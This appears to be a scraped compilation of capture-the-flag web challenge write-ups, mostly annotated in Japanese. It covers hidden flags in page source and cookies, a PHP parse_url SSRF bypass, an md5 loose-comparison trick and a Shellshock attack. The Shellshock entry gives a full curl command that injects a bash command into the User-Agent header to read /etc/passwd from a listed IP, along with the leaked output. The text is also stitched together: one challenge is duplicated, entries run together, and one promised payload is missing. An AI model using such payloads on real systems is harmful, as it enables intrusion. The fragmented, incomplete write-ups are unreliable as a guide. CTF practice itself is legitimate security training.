Bad JS
100
There is a bad JS which hides flag inside. Capture it.
MD5ハッシュ値を求めます。Flag is: MD5(127.0.0.1)
f528764d624db129b32c21fbca0cb8d6
UUTCTF{f528764d624db129b32c21fbca0cb8d6}
Bad JS
100
There is a bad JS which hides flag inside. Capture it.
MD5ハッシュ値を求めます。Flag is: MD5(127.0.0.1)
f528764d624db129b32c21fbca0cb8d6
UUTCTF{f528764d624db129b32c21fbca0cb8d6}
Web WarmUp
10
Literally, find the flag!
UUTCTF{P0SCon: Welcome to UUTCTF! Happy hacking ;)}です。
リンク先のページのソースを表示するとフラグが記載されています。Control You
Web201205Only those who give us the flag are exempt from our control.
フラグは、<script>function stop() {if (flag.value === "actf{control_u_so_we_can't_control_you}") {document.body.style.background = "red";}}</script>
actf{control_u_so_we_can't_control_you}
入力したURLのホスト名がlocalhostだと受け付けないようです。parse_url()関数の脆弱性でホスト名を誤って解釈させることができるようです。次のように入力するとフラグが表示されます。Brokerboard
183
It's the year 1997 and the Internet is just heating up! :fire:
In order to get ahead of the curve, SIT Industries® has introduced it's first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far to hire Kernel Sanders® to test the security!
However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_urlmagic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!
... or have they? :wink:
chal1.swampctf.com:1244
-= Created by andrewjkerr =-
flag{y0u_cANn0t_TRU5t_php}です。
Just understand the code ;)--------------------------------------------Challenge's URL :http://blackfoxs.org/radar/md5play
<?phpif(!isset($_GET['md5'])){die(highlight_file(__FILE__));}if (isset($_GET['md5']) and strlen($_GET['md5']) == 3 and !is_numeric($_GET['md5'])){$md5=$_GET['md5'];if (floatval($md5)==md5($md5)){die(highlight_file("flag.php"));}else{echo htmlspecialchars($md5)."!=",md5($md5);}}else{die(highlight_file(__FILE__));}?> 1
<?php$flag='radar{s0m3_bug5_1s_fun}';?> 1
radar{s0m3_bug5_1s_fun}
The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.
http://159.89.166.12:15000/
URLにアクセスします。htmlソースを確認すると<form>要素がありますが表示されていません。したがって、下記のようにhtmlソースから<form>要素のみを抽出してブラウザで表示します。<form action='http://159.89.166.12:15000/' method = "GET" target="resultFrame">Upload Your Profile Picture : <input type="file" name="profile_pic" ><input type="submit" value="Upload Image" name="submit"></form>
VGhlX3Njcm9sbF9zYXlzPXRoZV9uaWdodF9raW5nVlN2YWx5cmlhbi50eHQ=
The_scroll_says=the_night_kingVSvalyrian.txt
pctf{You_L00K_Wi3Rd_IN_H3R3}
Do prepare to see cookies lurking everywhere. http://159.89.166.12:13500/
bc54f4d60f1cec0f9a6cb70e13f2127a pc114d6a415b3d04db792ca7c0da0c7a55 tfb2984e12969ad3a3a2a4d334b8fb385a {c6f570c477ab64d17825ef2d2dfcb6fe4 0o988287f7a1eb966ffc4e19bdbdeec7c3 ki0d4896d431044c92de2840ed53b6fbbd 3sf355d719add62ceea8c150e5fbfae819 _@12eccbdd9b32918131341f38907cbbb5 re639307d281416ad0642faeaae1f098c4 _y96bc320e4d72edda450c7a9abc8a214f Umc716fb29298ad96a3b31757ec9755763 _b51de5514f3c808babd19f42217fcba49 Ut05cb7dc333ca611d0a8969704e39a9f0 _tbc781c76baf5589eef4fb7b9247b89a0 HEff108b961a844f859bd7c203b7366f8e y_2349277280263dff980b0c8a4a10674b @l0b1cdc9fe1f929e469c5a54ffe0b2ed5 s0364641d04574146d9f88001e66b4410f _rc758807125330006a4375357104f9a82 3vfcfdc12fb4030a8c8a2e19cf7b075926 Ea440c5c247c708c6e46783e47e3986889 L_97a7bf81a216e803adfed8bd013f4b85 @_c1d12de20210d8c1b35c367536e1c255 l0a8655da06c5080d3f1eb6af7b514e309 t}
pctf{c0oki3s_@re_yUm_bUt_tHEy_@ls0_r3vEaL_@_l0t}
Мы разработали продвинутую систему отслеживания параметров борта, нет ли в ней уязвимостей?
We develop advanced board tracking system, is it vulnerable?
<html><head><style>body, pre {color: #7b7b7b;font: 300 16px/25px "Roboto",Helvetica,Arial,sans-serif;}</style><meta name="generator" content="vi2html"></head><body></br>Welcome to control plane application of Aeroctf system.</br></br></br>On a dashboard you can see loading our system</br></br>Stats:</br><iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe></body></html>
$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://81.23.11.159:8080/cgi-bin/statsroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shAero{c58b51bee681ba3aa3971cef7aa26696}
Aero{c58b51bee681ba3aa3971cef7aa26696}
Difficulty: easy
gigem{be3p-bOop_rob0tz_4-lyfe}です。
gigsgigsgigsgigsgigs gigsgigsgigem{flag_in_gigsgigsgigsgigsgigsflaggigem(略)
(略)cookieSc00kiecookiecookiecookiecookiesgigem{continued == source_and_cookie{gigsgigemflaggigem(略)
gigem_continue=cookies}hax0r=flagflagflagflagflagflaggigs=all_the_cookiescookie=flagcookiegigemflagcookie
gigem{flag_in_source_and_cookies}